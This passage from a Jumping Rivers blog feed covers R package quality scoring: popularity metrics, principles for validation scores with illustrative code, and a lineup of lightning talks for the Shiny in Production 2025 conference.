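# all others are scored with the empirical CDF of the reference data
score_downloads = function(downloads, reference) {
  cdf = ecdf(reference)
  upper_quartile = quantile(reference, probs = 0.75, names = FALSE)
  ifelse(downloads >= upper_quartile, 1, cdf(downloads))
}

# Scores for a rarely used, a moderately used and a heavily used package
score_downloads(c(100, 2500, 50000), cran_downloads)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Because the reference distribution is passed in as an argument, the same function can be re-run whenever the underlying download data is refreshed.&lt;/p&gt;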
&lt;p&gt;&lt;img src="downloads.svg" alt="Score for Yearly downloads" style="width: 400px; display: block;
│ margin-left: auto; margin-right: auto"/&gt;&lt;/p&gt;
&lt;p&gt;Of course, you could choose a different period of time, say a month, or a trend over time.
But our investigations suggest that adding a variety of download-based scores yields very little new information,
while increasing complexity.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-litmus-scoring-popularity"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="score-2-reverse-dependencies"&gt;Score 2: Reverse Dependencies&lt;/h3&gt;
&lt;p&gt;We also examine the number of reverse dependencies, that is, how many other packages rely on the package being assessed.
The reasoning is simple: if many packages depend on it, there&amp;rsquo;s a greater chance that bugs will be spotted and fixed.
It also suggests that other developers have reviewed and trusted the package enough to build on top of it.&lt;/p&gt;
&lt;p&gt;Similar to package downloads, we used all packages on CRAN as a basis for scoring.
Packages in the top quartile for reverse dependencies receive a score of 1.
All others are scored using the empirical cumulative distribution function (CDF).
In practice, this ends up behaving like a near-binary score, since only a small number of packages have significant reverse dependencies.&lt;/p&gt;
&lt;h2 id="examples"&gt;Examples&lt;/h2&gt;
&lt;p&gt;We&amp;rsquo;ve selected five packages to illustrate these scores - the total litmus score is given in brackets:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;{drat}&lt;/code&gt; (0.94): A fantastic little package that simplifies creating local R repositories.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{microbenchmark}&lt;/code&gt; (0.87): A useful utility package for precisely measuring the execution time of function calls in R.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{shinyjs}&lt;/code&gt; (0.90): Perform common useful JavaScript operations in Shiny apps, created by Dean Attali.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{tibble}&lt;/code&gt; (0.81): The cornerstone(?) of the tidyverse.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{tsibble}&lt;/code&gt; (0.80): Tibbles for time series.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All five packages, as we would expect, have a high overall litmus score; we didn&amp;rsquo;t want to pick on more risky packages!&lt;/p&gt;
&lt;p&gt;For package popularity, which makes up 15% of the total litmus score, all five selected packages score the maximum of &lt;code&gt;1&lt;/code&gt; for both downloads and reverse dependencies.
Potentially, we could change the score to make it a more &amp;ldquo;continuous&amp;rdquo; measure.
For example, the number of downloads for &lt;code&gt;{tibble}&lt;/code&gt; will always exceed that of &lt;code&gt;{tsibble}&lt;/code&gt;, as the latter depends on the former.
However, the purpose of assessing packages isn&amp;rsquo;t to provide a &lt;strong&gt;ranked list&lt;/strong&gt; of packages; it&amp;rsquo;s to identify packages that are potentially risky.
So having a more continuous measure isn&amp;rsquo;t that helpful.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;We tend to think about package popularity as a way of crowd sourcing information about the package of interest.
As we&amp;rsquo;ve mentioned, it&amp;rsquo;s only a signal, and as such it contributes only 15% of the overall litmus score.&lt;/p&gt;
&lt;!--
downloads = 0:1e4
dd = tibble::tibble(downloads = downloads,
score = litmus.score:::cran_metric(downloads, "downloads", TRUE))
library(ggplot2)
svglite::svglite(
"~/jumpingrivers/brand/corporate-website/content/blog/2025-litmus-scoring-popularity/downloads.svg",
bg = "transparent")
ggplot(dd, aes(downloads, score)) +
geom_line(lwd = 2, colour = "#490F3A") +
xlab("Yearly Downloads") +
ylab("Score") +
theme_minimal() +
annotate("text", x = 2900, y= 0.52, hjust = "inward",
label = "A package with 2,500 downloads \n scores 0.5.",
size = 7) +
annotate("text", x = 7000, y= 1.06, hjust = "outward",
label = "Over 7,000 downloads, \n scores 1",
size = 7) +
theme(text = element_text(size=24))
dev.off()
--&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: Lightning Talk Lineup</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2025-lightning-lineup/</link><pubDate>Tue, 24 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2025-lightning-lineup/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-lightning-lineup/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2025-lightning-lineup/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h4 a:after { content: unset; }
main h4 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;We are pleased to announce the lightning talks for this year&amp;rsquo;s
&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt;
conference! We&amp;rsquo;ve already announced the full length talks (25 minutes each) in
&lt;a href="https://www.jumpingrivers.com/blog/shiny-in-production-2025-full-lineup/" rel="external"&gt;this blog&lt;/a&gt;. This blog however is all about
this year&amp;rsquo;s lightning talks session (5 minutes per talk).&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="lightning-talks"&gt;Lightning talks&lt;/h3&gt;
&lt;h4 id="andreas-wolfsbauer---ages---austrian-agency-for-health-and-food-safety"&gt;&lt;a href="https://www.linkedin.com/in/andreas-wolfsbauer-18069827b/" rel="external"&gt;Andreas Wolfsbauer&lt;/a&gt; - &lt;a href="https://www.ages.at/en/" rel="external"&gt;AGES - Austrian Agency for Health and Food Safety&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Enhancing Epidemiological Surveillance with a Shiny Application for Standardized Data Analysis&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The Agency for Health and Food Safety (AGES) is responsible for monitoring notifiable infectious diseases in Austria. Within the Institute for Surveillance &amp;amp; Infectious Disease Epidemiology, we have developed a Shiny application designed to provide standardized analysis and visualization of all (n=76) notifiable disease categories, by processing data from the epidemiological notification system of Austria.&lt;/p&gt;
&lt;p&gt;The application offers a dashboard that enables users to select specific diseases and visualize data through interactive plots. Features include filtering by year, federal state and age-group, facilitating descriptive epidemiological analysis of the notification data. An analysis tab allows users to apply custom filters and generate tailored plots, enhancing the depth of data exploration. Users can download all plots along with the underlying data and generate a PDF report. They also have the option to export filtered data as a CSV file for further use.
Further development plans include a starting page highlighting long-term trends, to provide a compact overview for quick identification of diseases requiring action. Additionally, we will create an information page that shows disease-specific metadata and analyses of seasonal trends.&lt;/p&gt;
&lt;p&gt;Furthermore, discussions are ongoing to develop a dashboard for broader accessibility, initially within the organization, with potential public access. Challenges encountered include optimizing application performance and availability, particularly given the constraints of utilizing the free version of Shiny Server. To address this, we are exploring parallel and asynchronous programming techniques to enhance efficiency and responsiveness. Additionally, we are evaluating deployment solutions such as ShinyProxy to improve multi-user access and scalability.&lt;/p&gt;
&lt;h4 id="david-carayon---inrae"&gt;&lt;a href="https://dcarayon.fr/" rel="external"&gt;David Carayon&lt;/a&gt; - &lt;a href="https://www.inrae.fr/en" rel="external"&gt;INRAE&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Rescuelog: a Shiny-Based Monitoring System for Lifeguards: Insights from Southwest France&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Drowning prevention on coastal beaches relies heavily on lifeguard vigilance and timely intervention. However, traditional rescue data collection methods often
suffer from inefficiencies, delayed reporting, and a lack of real-time analytics. To modernize lifeguard operations across the beaches of southwest France,
we developed an end-to-end open-source data pipeline powered by R, Shiny, and ruODK.&lt;/p&gt;
&lt;p&gt;At the core of this system is ruODK, an R package that facilitates seamless integration with Open Data Kit (ODK), a widely used tool for field data collection.
Lifeguards use tablets running ODK Collect to log rescue incidents in real time, which are then ingested directly into an R-managed database. The data is
processed, analyzed, and visualized through a Shiny dashboard, offering lifeguards and supervisors instant access to key operational insights, trend analysis,
predictive models and customizable reports.&lt;/p&gt;
&lt;p&gt;By leveraging R&amp;rsquo;s data manipulation capabilities (tidyverse) alongside Shiny&amp;rsquo;s interactivity, we achieved a fully automated and scalable monitoring system
that replaces paper-based logs with a dynamic, data-driven approach. Initial deployments in 2023 (on five beaches) demonstrated significant improvements
in efficiency and situational awareness, prompting an expansion to 80 beaches by 2025. The system’s open-source nature ensures cost-effectiveness,
reproducibility, and adaptability for other regions and applications.&lt;/p&gt;
&lt;p&gt;This project exemplifies how R and Shiny can power real-time decision-making in public safety operations. It also highlights the untapped potential of
ruODK for bridging field data collection with analytical pipelines—showcasing an impactful use case of Shiny in production.&lt;/p&gt;
&lt;h4 id="kia-mack---kent-wildlife-trust"&gt;&lt;a href="https://www.linkedin.com/in/kiamack/" rel="external"&gt;Kia Mack&lt;/a&gt; - &lt;a href="https://www.kentwildlifetrust.org.uk/" rel="external"&gt;Kent Wildlife Trust&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Building the Kent BNG Register: Shiny for UI-First Development in a Small Charity Tech Team&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;R Shiny is a powerful and beginner-friendly tool for rapidly developing interactive applications, but is it the best choice for UI-first web design?&lt;/p&gt;
&lt;p&gt;In this talk, we share our experience building the Kent Biodiversity Net Gain Site Register, a user-authenticated web portal that links the demand and supply of biodiversity credits. We’ll discuss the ways in which Shiny was a great fit—allowing rapid prototyping, seamless integration with R’s
data analysis tools, and reactive programming. We’ll explore why it suited a small conservation charity with a two-person team, enabling us to
build a functional, data-driven application without the need for specialist web development skills.&lt;/p&gt;
&lt;p&gt;However, we’ll also examine its limitations, from performance bottlenecks to challenges in creating a polished, responsive UI. We’ll share the
strategies we used to overcome these issues, including optimising reactive dependencies, using custom CSS and JavaScript for a more refined
UI, implementing caching and database indexing to improve performance, and leveraging Shiny modules to enhance scalability.&lt;/p&gt;
&lt;p&gt;Whether you&amp;rsquo;re considering Shiny for a large-scale project or looking for ways to improve an existing app, this talk will provide practical insights
into where Shiny excels and what can be learned from mainstream web development languages to improve our use of Shiny.&lt;/p&gt;
&lt;h4 id="natalia-petersen---nhs-england"&gt;&lt;a href="https://www.linkedin.com/in/natalia-petersen-385683131/" rel="external"&gt;Natalia Petersen&lt;/a&gt; - &lt;a href="https://digital.nhs.uk/ndrs" rel="external"&gt;NHS England&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Hackathon to Streamline the National Disease Registration Service Cancer Treatments Shiny App&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The Cancer Treatments dashboard is an interactive tool, built in Shiny, produced by the National Disease Registration Service (NDRS), within NHS England. The Shiny app displays graphs and tables presenting statistics on surgery, chemotherapy, and radiotherapy treatments for patients diagnosed with cancer in England.&lt;/p&gt;
&lt;p&gt;Users can choose to view the data by demographic factors such as ethnicity and stage at diagnosis, and by geography, via dropdown menus. The app is refreshed annually and is publicly available, aimed at supporting the understanding of cancer treatments for both technical and non-technical audiences. The previous Shiny code was long and repetitive, making it difficult to navigate, challenging to debug, time-consuming to run, and prone to human error due to limited automation.&lt;/p&gt;
&lt;p&gt;To address these concerns, whilst also delivering improvements to the user interface, the team took part in a targeted hackathon day where individuals each took on a specific workflow and set of objectives, guided by user feedback. The re-developed app is now built on the NDRS Shiny app template, ensuring consistent styling. Bespoke, reusable functions are sourced throughout the code, allowing for modularisation, and graphs are built using the Plotly
package to improve usability and interactivity. All code required for producing the publication is available on GitHub, increasing transparency and scope for reuse.&lt;/p&gt;
&lt;p&gt;Through collaborative effort, careful division of labour, communication in person and online, and application of Reproducible Analytical Pipeline principles, we were able to successfully and quickly deliver improvements to the Shiny app, which will be published in May 2025.&lt;/p&gt;
&lt;h4 id="rhian-davies---the-strategy-unit-nhs"&gt;&lt;a href="https://rhian.rbind.io/" rel="external"&gt;Rhian Davies&lt;/a&gt; - &lt;a href="https://www.strategyunitwm.nhs.uk/" rel="external"&gt;The Strategy Unit, NHS&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;The Accidental Engineers: Managing Shiny Apps, Pipelines, and Tech Debt in the NHS&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;How big should the hospitals of the future be? That’s the question we’re trying to answer. Our team has built a complex statistical model with over 100 parameters, using 140 million rows of patient data to help healthcare leaders plan for future demand. The model incorporates uncertainty, allowing users to explore different policy scenarios and compare their hospital against national benchmarks. But while the maths is complicated, the hardest part isn’t the modelling, it’s making sure everything keeps running smoothly.&lt;/p&gt;
&lt;p&gt;What started as a small data science project has grown into a sprawling web of interconnected tools, and some days, it feels like we’ve become accidental software engineers. Maintaining multiple Shiny apps, APIs, and pipelines across R, Python, and PySpark means we’re now juggling Databricks workflows, GitHub Actions, Azure Blob Storage, and Posit Connect deployments. Every month, we release a new version of the model while ensuring legacy versions are maintained and compatible. And with technical debt piling up, we’re starting to ask: do we keep patching things, or should we tear it all down and start again?&lt;/p&gt;
&lt;p&gt;This talk is an honest reflection on the challenges of managing large-scale Shiny apps in a high-pressure environment, how we balance new development with maintenance, and what we’ve learned along the way.
The code for all our tools is available publicly on GitHub.&lt;/p&gt;
&lt;h4 id="samer-hijjazi---md-anderson-cancer-center"&gt;&lt;a href="linkedin.com/in/samer-hijjazi"&gt;Samer Hijjazi&lt;/a&gt; - &lt;a href="https://www.mdanderson.org/" rel="external"&gt;MD Anderson Cancer Center&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;From Clicks to Insights: Harnessing RSelenium in R Shiny Applications&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This talk explores the opportunity to incorporate the RSelenium package into R Shiny applications. RSelenium is a package which allows users to perform web automation and advanced web scraping. In comparison to rvest, RSelenium can give you the ability to web scrape data from more difficult websites. This talk would teach the R community a lot about web automation, as well as showing another creative way of using R Shiny applications.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-lightning-lineup/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Package Quality: Validation and beyond!</title><link>https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/</link><pubDate>Thu, 19 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of a five part series of related posts on validating R packages.
Other posts in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/" rel="external"&gt;Validation Guidelines&lt;/a&gt; (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/" rel="external"&gt;Package Popularity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/" rel="external"&gt;Package Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/" rel="external"&gt;Code Quality&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/" rel="external"&gt;Maintenance&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As is often the case, it&amp;rsquo;s pretty easy to talk about “good” R packages.
We can even wave our hands and talk about packages following “software standards” or “best practices”. But what does that mean?&lt;/p&gt;
&lt;p&gt;Most of us would agree that packages like &lt;code&gt;{Rcpp}&lt;/code&gt; or &lt;code&gt;{dplyr}&lt;/code&gt; are solid.
At the other end of the spectrum, we could point to outdated, poorly tested or unmaintained packages as &amp;ldquo;risky&amp;rdquo;.
But the reality is that most R packages fall somewhere in between.&lt;/p&gt;
&lt;p&gt;A package may excel in certain aspects whilst falling short in others, or it might be a perfectly adequate solution for specific use cases whilst being unsuitable for mission-critical applications.
The primary objective of this post is to assist organisations and individual practitioners in developing a clearer, more systematic understanding of the packages upon which they depend.
It&amp;rsquo;s important to acknowledge upfront that any scoring system will have limitations—some genuinely high-quality packages might receive unexpectedly low scores due to specific circumstances, whilst some packages with significant underlying issues might score well on surface-level metrics.
However, this doesn&amp;rsquo;t diminish the considerable value of establishing a consistent, structured framework for package assessment.&lt;/p&gt;
&lt;p&gt;In developing &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmus&lt;/a&gt;, our solution for R package assessment and validation, we&amp;rsquo;ve had to wrestle with these concepts in great detail.
We have come up with a framework that we believe addresses the challenges presented by package validation.
In the coming series of Litmus blog posts, we will be examining in detail the choices we made to balance the need for both robustness and flexibility in R package quality assessment.&lt;/p&gt;
&lt;p&gt;Before examining the specifics of how we evaluate and score packages, it&amp;rsquo;s crucial to understand the foundational principles that underpin our methodology.
In this post, we will be digging into the core principles of our approach.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-litmus-scoring-r-validation"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="guideline-1-scores-are-not-static"&gt;Guideline 1: Scores are not static&lt;/h3&gt;
&lt;p&gt;At first glance, this principle might appear counterintuitive, but it reflects a fundamental reality: the standards we apply to R packages today cannot reasonably be identical to those we might have employed in 2015, nor should they remain unchanged looking forward to 2030.&lt;/p&gt;
&lt;p&gt;Consider the obvious evolution in scale: package download numbers have increased dramatically over the past decade, reflecting both the growth of the R community and the maturation of package distribution infrastructure. More subtly but equally importantly, the general tooling ecosystem has undergone dramatic improvements. Modern development practices now routinely include automated testing via GitHub Actions, comprehensive code coverage analysis, automated dependency checking, and sophisticated static analysis tools. Packages developed today have access to these resources in ways that simply weren&amp;rsquo;t feasible or standard practice a decade ago. Since &lt;em&gt;number of downloads&lt;/em&gt; represents a metric of package popularity, what is considered a high vs. low number of downloads will need to be periodically adjusted.&lt;/p&gt;
&lt;p&gt;Furthermore, our scoring approach is explicitly tied to specific package versions. When a maintainer releases a new version of a package, potentially addressing security vulnerabilities, improving documentation, adding new features, or enhancing test coverage, the previous version often becomes a less optimal choice despite having been perfectly adequate when it was current.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; We implement an annual comprehensive audit of our scoring mechanisms. This yearly review process serves multiple functions: updating the underlying data used to generate scores where relevant (such as adjusting download thresholds to reflect ecosystem growth), introducing new scoring criteria as best practices evolve, and retiring metrics that may have become less relevant or discriminatory.&lt;/p&gt;
&lt;h3 id="guideline-2-scores-shouldnt-change-often"&gt;Guideline 2: Scores shouldn&amp;rsquo;t change often&lt;/h3&gt;
&lt;p&gt;While we acknowledge that scores are transient, they shouldn&amp;rsquo;t change often or dramatically.
For example, it makes sense to audit our scoring mechanism for downloads once a year and adjust the criteria.
This would change scores on packages, but only in a small way.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; We maintain disciplined annual audits of our scoring mechanisms, with changes implemented deliberately and with clear documentation of the rationale.
Between these annual reviews, scoring criteria remain stable unless critical issues are identified.&lt;/p&gt;
&lt;h3 id="guideline-3-cutoffs-depend-on-use-cases"&gt;Guideline 3: Cutoffs depend on use cases&lt;/h3&gt;
&lt;p&gt;In an ideal world, we should “hand analyse” all packages, spending time assessing each package individually.
From a practical perspective, focusing our attention on the borderline packages, those that are almost good enough or &lt;em&gt;just&lt;/em&gt; good enough to make the cut, makes sense.
However, what constitutes &amp;ldquo;borderline&amp;rdquo; varies dramatically depending on the intended application.
A package being considered for use in a regulatory submission to the FDA faces entirely different quality requirements compared to one being used in an MSc Statistics project or an exploratory data analysis. The former context demands extensive validation, comprehensive documentation, and demonstrated stability, whilst the latter might reasonably accept some additional risk in exchange for cutting-edge functionality or convenience.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; Rather than imposing universal &amp;ldquo;risky&amp;rdquo; package thresholds, we advocate for situation-dependent cutoffs that reflect the specific requirements and risk tolerance of different use cases. We provide guidance for establishing appropriate thresholds for common scenarios whilst recognising that organisations may need to customise these based on their specific regulatory, commercial, or academic contexts.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;See our post on &lt;a href="https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/" rel="external"&gt;Risk Appetite&lt;/a&gt; for more on this.&lt;/strong&gt;&lt;/p&gt;
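&lt;p&gt;As a rough illustration of situation-dependent cutoffs, the sketch below triages the same score differently depending on the use case. The use-case names, the cutoff values, the &lt;code&gt;margin&lt;/code&gt; parameter and the &lt;code&gt;triage&lt;/code&gt; function are all hypothetical, chosen only to show the idea; they are not the thresholds Litmus uses.&lt;/p&gt;

```python
# Hypothetical cutoffs on a 0-1 score scale; real values would be set per organisation.
CUTOFFS = {
    "regulatory_submission": 0.85,
    "internal_reporting": 0.70,
    "exploratory_analysis": 0.50,
}


def triage(score: float, use_case: str, margin: float = 0.05) -> str:
    """Classify a package score relative to the cutoff for a given use case.

    Scores within `margin` of the cutoff are treated as borderline,
    which is where hand analysis is most worthwhile.
    """
    cutoff = CUTOFFS[use_case]
    if score >= cutoff + margin:
        return "accept"
    if score >= cutoff - margin:
        return "borderline: review by hand"
    return "reject"


# The same score leads to a different decision in each context.
for use_case in CUTOFFS:
    print(use_case, triage(0.72, use_case))
```

&lt;p&gt;With these assumed numbers, a score of 0.72 is rejected for a regulatory submission, flagged as borderline for internal reporting, and accepted for exploratory work.&lt;/p&gt;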
&lt;h3 id="guideline-4-good-packages-may-have-serious-issues"&gt;Guideline 4: “Good” packages may have serious issues&lt;/h3&gt;
&lt;p&gt;It&amp;rsquo;s crucial to recognise that even the most well-regarded packages can face problems that lie entirely outside their maintainers&amp;rsquo; direct control. For example, a package might depend on a system library that subsequently reveals a security vulnerability, or one of its dependencies might become unmaintained. Alternatively, changes in the broader R ecosystem—such as modifications to base R or updates to critical dependencies—might create compatibility issues that haven&amp;rsquo;t yet been addressed.
These scenarios highlight why a single numerical score, whilst valuable for initial triage, cannot capture the full complexity of package risk assessment. Some issues represent genuine &amp;ldquo;showstoppers&amp;rdquo; that require immediate attention regardless of a package&amp;rsquo;s overall score.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; Whilst maintaining our commitment to clear, interpretable numerical scores for initial assessment, we supplement these with specific flags for &amp;ldquo;showstopper&amp;rdquo; issues that require immediate human review. These might include known security vulnerabilities, dependencies on risky packages, or compatibility issues with current R versions.&lt;/p&gt;
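&lt;p&gt;One way to picture this is a record that carries the numerical score alongside a list of showstopper flags, so that a high score can never hide a flagged issue. The &lt;code&gt;Assessment&lt;/code&gt; class, its fields and the example package names below are assumptions made for illustration, not the Litmus data model.&lt;/p&gt;

```python
from dataclasses import dataclass, field


@dataclass
class Assessment:
    """A numerical score plus any showstopper flags (hypothetical structure)."""

    package: str
    score: float
    showstoppers: list[str] = field(default_factory=list)

    def needs_human_review(self) -> bool:
        # Any flag triggers review, regardless of how high the score is.
        return len(self.showstoppers) != 0


def summarise(assessment: Assessment) -> str:
    """Render a one-line summary that always surfaces showstopper flags."""
    base = f"{assessment.package}: score {assessment.score:.2f}"
    if assessment.needs_human_review():
        flags = "; ".join(assessment.showstoppers)
        return f"{base}, REVIEW REQUIRED ({flags})"
    return base


# Made-up packages: a high score with a flag still demands attention.
print(summarise(Assessment("examplepkg", 0.91, ["known security vulnerability"])))
print(summarise(Assessment("otherpkg", 0.50)))
```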
&lt;h3 id="guideline-5-avoid-cliff-edges"&gt;Guideline 5: Avoid cliff edges&lt;/h3&gt;
&lt;p&gt;Regardless of your statistical persuasion, we can all agree that having a super hard cut-off of “p = 0.05” is silly.
The idea that “p = 0.05000001” is “not significant”, but “p = 0.04999999” can change the world, doesn&amp;rsquo;t really make sense.
The same idea should apply to scores.
Where possible, the scoring mechanism should be smooth and continuous.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; We employ continuous, smooth scoring functions wherever possible. For example, rather than awarding full points for packages with &amp;gt;80% test coverage and zero points for those with &amp;lt;80%, we use gradual scoring curves that reward improvements at all levels whilst still recognising meaningful distinctions in quality.&lt;/p&gt;
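&lt;p&gt;To make the contrast concrete, here is a minimal sketch comparing a hard 80% cutoff with a smooth curve. The logistic function, its &lt;code&gt;midpoint&lt;/code&gt; and its &lt;code&gt;steepness&lt;/code&gt; are assumptions picked for illustration; the post does not say which curve Litmus actually uses.&lt;/p&gt;

```python
import math


def cliff_edge_score(coverage: float, cutoff: float = 0.8) -> float:
    """Hard threshold: full points at or above the cutoff, zero below it."""
    return 1.0 if coverage >= cutoff else 0.0


def smooth_score(coverage: float, midpoint: float = 0.8, steepness: float = 10.0) -> float:
    """Logistic curve (an assumed choice): the score rises gradually with coverage."""
    return 1.0 / (1.0 + math.exp(-steepness * (coverage - midpoint)))


# Coverage is expressed as a fraction between 0 and 1.
for coverage in (0.60, 0.79, 0.81, 0.95):
    print(coverage, cliff_edge_score(coverage), round(smooth_score(coverage), 3))
```

&lt;p&gt;Under the hard threshold, moving from 79% to 81% coverage flips the score from zero to full marks; under the smooth curve the same change shifts the score only slightly, while 60% and 95% coverage remain clearly separated.&lt;/p&gt;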
&lt;h3 id="guideline-6-not-all-scores-are-created-equally"&gt;Guideline 6: Not all scores are created equally&lt;/h3&gt;
&lt;p&gt;A score based on whether or not there is a maintainer should count more towards an overall score than a score based on whether or not there is a website URL.
The former is more important than the latter in most cases, and thus should contribute more towards an overall score, if this overall score is to be considered useful.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; We use a scoring strategy that weights individual metrics sensibly within categories, which are themselves weighted to reflect their relative importance. We will discuss this strategy in more detail in a later blog post, but here is the general idea.&lt;/p&gt;
&lt;p&gt;We think of package quality as having four attributes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Documentation (weight 15%): Assesses the quality and completeness of the package documentation.
This is clearly subjective, as a package with full documentation could still have “bad” or outdated documentation.
Nevertheless, packages that lack examples in their help pages, vignettes or NEWS files have lower scores.&lt;/li&gt;
&lt;li&gt;Code (weight 50%): This evaluates the quality and structure of the package code.
Key components of this score include package dependencies (always a controversial topic), the number of exported objects, vulnerabilities, and test coverage.&lt;/li&gt;
&lt;li&gt;Maintenance (weight 20%): Reviews standard maintenance aspects of the package, including update frequency, bug management, and number of contributors.&lt;/li&gt;
&lt;li&gt;Popularity (weight 15%): Reviews the package&amp;rsquo;s popularity. This includes package downloads over the last year and reverse dependencies.
The idea is that these are strong indicators that the community has already placed trust in that package.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These numbers can of course be adjusted.&lt;/p&gt;
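&lt;p&gt;The weights listed above can be combined into an overall score with a simple weighted average, sketched below. Only the four weights come from this post; the &lt;code&gt;overall_score&lt;/code&gt; function, the 0 to 1 scale and the example category scores are assumptions for illustration.&lt;/p&gt;

```python
# Category weights as listed in this post.
WEIGHTS = {
    "documentation": 0.15,
    "code": 0.50,
    "maintenance": 0.20,
    "popularity": 0.15,
}


def overall_score(category_scores: dict[str, float], weights: dict[str, float] = WEIGHTS) -> float:
    """Weighted average of category scores, each assumed to lie between 0 and 1.

    Dividing by the total weight keeps the result on the same scale
    even if the weights are adjusted and no longer sum to exactly 1.
    """
    total_weight = sum(weights.values())
    weighted_sum = sum(weights[name] * category_scores[name] for name in weights)
    return weighted_sum / total_weight


# Made-up category scores for a hypothetical package.
example = {"documentation": 0.9, "code": 0.6, "maintenance": 0.8, "popularity": 0.4}
print(round(overall_score(example), 3))
```

&lt;p&gt;Because the code category carries half of the total weight, a weak code score pulls the overall result down far more than a weak popularity score does.&lt;/p&gt;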
&lt;h2 id="implementation-considerations-and-future-development"&gt;Implementation Considerations and Future Development&lt;/h2&gt;
